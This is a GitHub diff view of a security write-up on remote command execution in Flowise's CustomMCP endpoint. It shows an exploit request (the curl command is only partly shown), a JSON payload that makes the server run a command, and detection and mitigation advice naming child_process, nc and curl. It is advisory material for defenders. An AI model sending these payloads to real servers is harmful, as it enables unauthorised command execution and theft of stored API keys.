You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Flowise embeds MCP tooling inside its low-code LLM orchestrator, but its **CustomMCP** node trusts user-supplied JavaScript/command definitions that are later executed on the Flowise server. Two separate code paths trigger remote command execution:
165
+
166
+
-`mcpServerConfig` strings are parsed by `convertToValidJSONString()` using `Function('return ' + input)()` with no sandboxing, so any `process.mainModule.require('child_process')` payload executes immediately (CVE-2025-59528 / GHSA-3gcm-f6qx-ff7p). The vulnerable parser is reachable via the unauthenticated (in default installs) endpoint `/api/v1/node-load-method/customMCP`.
167
+
- Even when JSON is supplied instead of a string, Flowise simply forwards the attacker-controlled `command`/`args` into the helper that launches local MCP binaries. Without RBAC or default credentials, the server happily runs arbitrary binaries (CVE-2025-8943 / GHSA-2vv2-3x8x-4gv7).
168
+
169
+
Metasploit now ships two HTTP exploit modules (`multi/http/flowise_custommcp_rce` and `multi/http/flowise_js_rce`) that automate both paths, optionally authenticating with Flowise API credentials before staging payloads for LLM infrastructure takeover.
170
+
171
+
Typical exploitation is a single HTTP request. The JavaScript injection vector can be demonstrated with the same cURL payload Rapid7 weaponised:
172
+
173
+
```bash
174
+
curl -X POST http://flowise.local:3000/api/v1/node-load-method/customMCP \
Because the payload is executed inside Node.js, functions such as `process.env`, `require('fs')`, or `globalThis.fetch` are instantly available, so it is trivial to dump stored LLM API keys or pivot deeper into the internal network.
186
+
187
+
The command-template variant exercised by JFrog (CVE-2025-8943) does not even need to abuse JavaScript. Any unauthenticated user can force Flowise to spawn an OS command:
188
+
189
+
```json
190
+
{
191
+
"inputs": {
192
+
"mcpServerConfig": {
193
+
"command": "touch",
194
+
"args": ["/tmp/yofitofi"]
195
+
}
196
+
},
197
+
"loadMethod": "listActions"
198
+
}
199
+
```
200
+
201
+
#### Detection ideas
202
+
203
+
- Web server or Flowise logs containing requests to `/api/v1/node-load-method/customMCP` with unexpected `loadMethod` values, or payloads that reference `process.mainModule`, `child_process`, `fs`, etc.
204
+
- Process creation telemetry from the Flowise host for binaries launched under the Flowise service account (e.g., sudden `bash`, `powershell`, `curl`, `nc`, `python`).
205
+
- File integrity monitoring around `/tmp`, project directories, or `/home/flowise/.flowise` for artefacts created immediately after Flowise receives `customMCP` requests.
206
+
207
+
#### Mitigations
208
+
209
+
- Upgrade to **Flowise 3.0.6+** where `convertToValidJSONString` and the custom MCP loader were hardened; earlier versions (≤3.0.5) are trivially exploitable.
210
+
- Set `FLOWISE_USERNAME`/`FLOWISE_PASSWORD`, disable anonymous API access, and restrict `/api/v1/node-load-method/*` to trusted admin subnets via reverse proxies.
211
+
- Remove Custom MCP capability if not strictly required (`DISABLE_FLOWISE_CUSTOM_MCP=1`) or wrap it with an allow-list proxy so only vetted executables can be launched.
212
+
- Monitor and rotate any secrets stored inside Flowise (LLM provider API keys, database passwords) after an incident because the RCE primitives grant full filesystem and network access.
213
+
162
214
## References
163
215
-[CVE-2025-54136 – MCPoison Cursor IDE persistent RCE](https://research.checkpoint.com/2025/cursor-vulnerability-mcpoison/)
0 commit comments